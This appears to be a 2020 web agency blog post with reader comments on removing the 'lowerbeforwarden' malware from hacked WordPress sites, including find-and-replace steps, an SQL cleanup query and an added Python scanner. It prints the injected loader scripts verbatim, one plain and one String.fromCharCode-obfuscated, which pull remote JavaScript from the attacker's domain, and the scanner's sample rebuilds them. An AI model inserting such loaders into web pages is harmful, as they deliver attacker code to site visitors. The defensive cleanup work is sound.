File Manager Hacked: Nasty new Malware doing the rounds – lowerbeforwarden
EDIT 6th Sept 2020 00:02: Due to the high volumes of requests for help with this virus, we’ve recorded a video detailing how to fix it. It’s a live run through of a real site, so the video is 50 minutes long, but will hopefully help people solve their issues
EDIT 5th Sept 2020 15:13: Wow this is affecting a lot of sites! Just done one that was slightly different. In the script the n=ns1 part was n=nb5 and this one had some encrypted code too (see further down). Also it had added an exclusion in the Wordfence advanced section to remain undetected
EDIT 5th Sept 2020 14:08: A zero day vulnerability was detected in the popular File Manager plugin and that’s one of the ways the virus was getting in. This has been patched – please update your File Manager plugin if you have it installed
A nasty new malware has started making the rounds. The virus seems to be targeting WordPress sites – this makes sense as not only does WordPress make up over 1/3 of the internet, but a lot of WordPress sites are out of date DIY builds.
Where most target a single vulnerability, the “lowerbeforwarden Virus” seems to use a number of known vulnerabilities.
It seems to have only reared its ugly head on 31st August (2020), so it’s a bit early to give a full list of the vulnerabilities targeted or to say whether this is a new zero day, but a quick search out there shows lots of sites infected this week including:
- www.airlinehaber.com
- www.capitalone.com.vn
- lcps.org.uk
- megastararena.com
- www.aplapollo.com
- www.nahhs.com
How to remove the Lowerbeforwarden Virus from your site
1) The first step is damage limitation, so pop your hosting in maintenance mode or “suspend” the service. It’s better that your visitors see a temporarily unavailable message than some random site.
2) Take a full back-up of your code and database.
3) Download your site to your local machine and open the folder in a text editor such as Atom, Sublime, Dreamweaver, etc. Do a “find in files” for the following code and then “replace all” with an empty field:
<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>
3B) Update: Some sites seem to have the n=ns1 part replaced with n=nb5, and also carry the following obfuscated script, which should be removed by the same method:
<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>
Decoded (each String.fromCharCode call resolves to a plain string), that script reads as follows; all it does is create a script element pointing at scripts.lowerbeforwarden.ml/src.js and insert it into the page head:
<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement('script'); elem.type = 'text/javascript'; elem.src = 'https://scripts.lowerbeforwarden.ml/src.js'; elem.appendAfter(document.getElementsByTagName('script')[0]);elem.appendAfter(document.getElementsByTagName('head')[0]);document.getElementsByTagName('head')[0].appendChild(elem);})();</script>
4) Once you’ve re-uploaded those files you should be able to log in to WordPress again without getting redirected. Install the Wordfence plugin and run a scan to clean up any stray malicious files.
5) Some people have also reported finding the same code in the database, so you may need to open your database in something like phpMyAdmin and run this SQL command:
UPDATE wp_posts SET post_content = REPLACE(post_content, "<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>", "");
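Added example (not from the post or Dorset Tech’s own tooling): a Python scanner that automates the find-and-replace of steps 3 and 3B over the local site download and flags files it could not clean automatically. It assumes the site has been downloaded as in step 3; DOMAIN, SAMPLE and the function names are this example’s own, and SAMPLE is a constructed page, not a real capture. The same clean() function can be run over post_content values exported from the database before deciding on the UPDATE in step 5.

```python
import re
from pathlib import Path

DOMAIN = "lowerbeforwarden.ml"
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>.*?</script>", re.S | re.I)
CHARCODE = re.compile(r"String\.fromCharCode\(([\d,\s]*)\)")
SCAN_SUFFIXES = {".php", ".html", ".htm", ".js"}

def decode_charcodes(js: str) -> str:
    """Resolve every String.fromCharCode(104,116,...) call to the text it builds."""
    return CHARCODE.sub(
        lambda m: "".join(chr(int(c)) for c in m.group(1).split(",") if c.strip()), js)

def find_injections(html: str) -> list:
    """<script> blocks that reference the malware domain, plainly or behind fromCharCode."""
    return [m.group(0) for m in SCRIPT_BLOCK.finditer(html)
            if DOMAIN in decode_charcodes(m.group(0)).lower()]

def clean(html: str) -> str:
    """Strip the injected script blocks and leave everything else untouched."""
    for block in find_injections(html):
        html = html.replace(block, "")
    return html

def scan_tree(root, fix: bool = False) -> dict:
    """Map each affected file under root to (blocks removed, domain still present).
    The flag catches loader code appended to plugin .js files: no <script> tag to cut,
    so review by hand or reinstall the plugin (as commenters below did)."""
    report = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        text = path.read_text(encoding="utf-8", errors="surrogateescape")
        blocks, cleaned = find_injections(text), clean(text)
        residual = DOMAIN in decode_charcodes(cleaned).lower()
        if blocks or residual:
            report[str(path)] = (len(blocks), residual)
            if fix and blocks:
                path.write_text(cleaned, encoding="utf-8", errors="surrogateescape")
    return report

# Constructed sample (not a real capture): one legitimate script, the ns1 and nb5
# literal loaders from the post, and a fromCharCode-obfuscated loader.
_CODES = ",".join(str(ord(c)) for c in f"https://scripts.{DOMAIN}/src.js")
SAMPLE = (
    "<script src='/wp-includes/js/jquery.js'></script>\n"
    f"<script src='https://temp.{DOMAIN}/temp.js?n=ns1' type='text/javascript'></script>\n"
    f"<script src='https://temp.{DOMAIN}/temp.js?n=nb5' type='text/javascript'></script>\n"
    "<script type=text/javascript> (function(){var e=document.createElement('script');"
    f"e.src=String.fromCharCode({_CODES});document.head.appendChild(e);}})();</script>\n"
)
```

Run scan_tree("path/to/site-download") first to see the report, then again with fix=True; files flagged with the second value True still need manual attention.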
Obviously if this all seems like too much, just give us a shout at [email protected] and we’ll fix it for you.
How to prevent it happening again
WordPress is one of the most frequently updated CMSs going, so in most cases if you keep WordPress and its plugins updated you’ll be safe from this kind of virus. Keep Wordfence installed too, as it’s a great first line of defence.
Oh my god you are a life saver thank you so much
More than welcome
Got this virus in one of the sites I administer. I decided to just delete all theme and plugin files and do a WordPress reinstall to be sure.
I have also found that in the assets/js folders of many of the plugins, and in other folders, all js files had been modified with “append” code
Hey Andres
Yeah, that’s certainly one way to do it if the site is “stock”. Still do the Wordfence scan though, as some of the ones I’ve fixed have had some malicious files in the uploads folder too
Hi Chris, Watching your video now to ensure site is all set with security, thanks for this big contribution my friend.
You were totally right, we thought we had fixed it and yesterday night the malware ran again through a script in the uploads folder, amazing and tricky hack!
I did a whole server delete except upload files (pics only) and wp-config as well, and recopied a fresh WordPress version and theme.
Things are going well and now running a wordfence scan.
Thanks for your help and follow up on this malware!
BTW we have also found a whole lot of this script in database like you mentioned in video.
Many thanks, thank you!!!!
Problem resolved for me.
The problem was in header.php in my theme,
and in the database I searched for lowerbeforwarden and deleted it.
Thanks Dorset!
Thank you for this article! A real life saver indeed!
Hi, I work for Dorset Tech. Just so some people are aware, some themes come with Theme Options, which allow you to change theme settings and styling specific to your theme. Sometimes it is best to export these options, in case it loses some of the custom styling due to plugin deactivation etc. Or you may just need to go back to Theme Options and Save Settings, which I had to do on a site I was fixing from this nasty virus. Hope this helps someone
When you go into the SQL and run the update query, yours doesn’t work at first. What was the problem you fixed to make it work? I am having the same issue. If I can’t get it to work, do I just go to every row that has the malicious script in it, and delete it?
Also, most of my infected files appear to be plugins, so can I just delete them all and then reinstall fresh versions?
If you ignore the syntax warning and run the script it’ll work fine. I tried to avoid the warning by using single quotes but it didn’t like that. There will be infected files outside of the plugins, so best to do the find/replace and Wordfence method to be sure
how do you ignore and run it anyway? I can’t seem to do it as it gives me an error every time.
So if you paste it exactly how I have written it in the post, but make sure the double quotes are actually straight quotes (") rather than curly ones, as they can be affected, it’ll work fine.
The only exception is if your table has a different prefix, in which case you need to change that bit. Ignore the warning in that case
Hello, I also got the same problem this morning. Please, how can I run it on my SQL, or can you please help me do it?
I’m running out of data…
Hey Aliyu
We’ve seen a few different variants of the virus this week, but all can be fixed by following the steps in this blog and video. We can of course help, but would need server logins and WordPress logins. Send us details at [email protected] and we’ll take a look.
OK sir, thank you very much.
I will send it now.
is it recommended to change database passwords etc after this infection?
I do as a precaution, but after looking through the encrypted code, they’re not taking any data, just leaving malicious files. Some people have reported a new Admin user from the attack, but that’s likely from another attack.
Hello Chris, thank you so much for your help. I found the initial problem in the Uploads folder:
a PHP file called: wp-stream.php
and a file called: Ite_
From there the virus expands itself. It seems like this virus gets an update or something similar; I found SQL commands in the Ite_ files to rename its code.
Thank you again!
I was affected by this but I can’t find anything in the database.
I have had multiple files and folders created. One being a download folder in the public html directory with moban.html and index.html. I then had multiple gifs which seem to actually be htaccess files. The attacker had added a Google verification html file to the public html folder and used it to add many sitemaps/categorymaps and taken over control of Google Search Console.
There is also an assortment of other php files etc. which I have removed, although I’m not confident the backdoor has been closed. Any advice?
Usually I would just restore from backups but all my backups seem to be affected too..
Oh, that’s actually a different virus. Yeah, there’s not normally anything in the database with that one. A Wordfence scan on the sensitive setting level should find all the files. Alternatively, if you’re running something like Plesk on the hosting, then you can install Imunify AV, which is very good at detecting malware.
You’ve ended my four day long hunt!
God Bless you man. Have a great day!